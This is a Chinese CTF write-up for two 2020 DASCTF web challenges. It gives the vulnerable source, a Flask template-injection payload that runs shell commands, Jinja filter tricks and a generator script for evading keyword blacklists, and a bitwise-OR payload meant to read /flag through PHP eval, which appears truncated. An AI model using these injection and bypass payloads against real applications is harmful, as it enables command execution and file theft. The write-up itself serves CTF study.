2020DASCTF八月浪漫七夕战
安恒大学
注入点在邮箱注册那里,无法复现了,提一下
ezflask
源代码
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import Flask, render_template, render_template_string, redirect, request, session, abort, send_from_directory
app = Flask(__name__)
@app.route("/")
def index():
def safe_jinja(s):
blacklist = ['class', 'attr', 'mro', 'base',
'request', 'session', '+', 'add', 'chr', 'ord', 'redirect', 'url_for', 'config', 'builtins', 'get_flashed_messages', 'get', 'subclasses', 'form', 'cookies', 'headers', '[', ']', '\'', '"', '{}']
flag = True
for no in blacklist:
if no.lower() in s.lower():
flag = False
break
return flag
if not request.args.get('name'):
return open(__file__).read()
elif safe_jinja(request.args.get('name')):
name = request.args.get('name')
else:
name = 'wendell'
template = '''
<div class="center-content">
<p>Hello, %s</p>
</div>
<!--flag in /flag-->
<!--python3.8-->
''' % (name)
return render_template_string(template)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000)
解题思路
代码倒是还行,审计没啥难度。只有一个根路由,ssti模板注入,大概意思就是paylaod里不能有黑名单的字符串等,否则会报错,成功bypass后获得flag。那么问题就来了,几乎过滤了常见的ssti所有字符串。如何bypass呢?
bypass
{{"".__class__.__mro__[1].__subclasses__()[300].__init__.__globals__["os"]["popen"]("whoami").read()}}
上面是ssti最基本的payload,基于此进行bypass,这里过滤了引号,request,chr,subclasses,加号,导致关键字被过滤了,无法通过拼接或者转义其中任何一种方式构造payload,所以我在这里思路断了,在网上也没搜索到可以替换subclasses的方法,看y1ng师傅的wp,y1ng,yyds!
我发现真的吐血了,原题,为什么我比赛的时候搜不到这题,写wp的时候一搜就搜到了。CBCTF easyflask
我们需要知道的知识:
- python中的__doc__是什么?
一般而言,是对函数/方法/模块所实现功能的简单描述。
2.如何不使用上面的黑名单构造payload?
- {% set ca = dict(ca=aa,t=dd)|join() %} //cat
- {%set c=dict(c=1).keys()|reverse|first%} //c
- {{(dict(a=1))|string|truncate(3,True,a|string)|list|last}} == 'a' //a
使用上面一种方法即可构造,这里我还没有琢磨透,找个时间仔细琢磨下payload的构造把
exp
这里直接贴脚本了
payload = '{%set pc = g|lower|list|first|urlencode|first%}{%set c=dict(c=1).keys()|reverse|first%}{%set udl=dict(a=pc,c=c).values()|join %}'
payload = ''
def get_alp(alp, goal):
num = ord(alp)
result = '{%set {goal}=dict(a={goal},c=udl%({num})).values()|join %}'.replace(
'{num}', str(num)).replace('{goal}', goal)
return result
def get_word(des, goal):
# goal = 'ds2'
# des = '__globals__'
result = ''
for i in des:
result += (get_alp(i, goal))
return result
def main():
# poc = "url_for.__globals__.__builtins__.open('/flag').read()"
i = 0
while(1):
text = input('>')
print('i'+str(i), end=':')
print(get_word(text, 'i'+str(i)))
i += 1
main()
知识点
- ssti绕过新姿
ezrce
源代码
<?php
error_reporting(0);
show_source(__FILE__);
$code=$_POST['code'];
$_=array('a','b','c','d','e','f','g','h','i','j','k','m','n','l','o','p','q','r','s','t','u','v','w','x','y','z','@','\~','\^','\[','\]','\&','\?','\<','\>','\*','1','2','3','4','5','6','7','8','9','0');
//This blacklist is so stupid.
$blacklist = array_merge($_);
foreach ($blacklist as $blacklisted) {
if (preg_match ('/' . $blacklisted . '/im', $code)) {
die('you are not smart');
}
}
eval("echo($code)");
?>
解题思路
过滤了数字,字母,异或,取反的rce,只要最后能执行eval里的语句即可。这两道题过滤的是真狠,几乎所有常见的bypass都过滤了
这里看到有两种思路,y1ng师傅的或者是|按位或运算符
|按位或运算
其实按位或运算的思想挺简单,就是当时没往这里想,首先看看,反引号没有被禁,那么我们就用反引号构造
payload的有很多
挑一个readfile(/flag)
这里就用反引号的二进制位与payload的二进制位对比,得出最后的payload:
('````````')|' ')('/````'|'/'))//readfile(/flag)
总结思路
寻找新的运算符构造payload
知识点
- rcebypass新姿势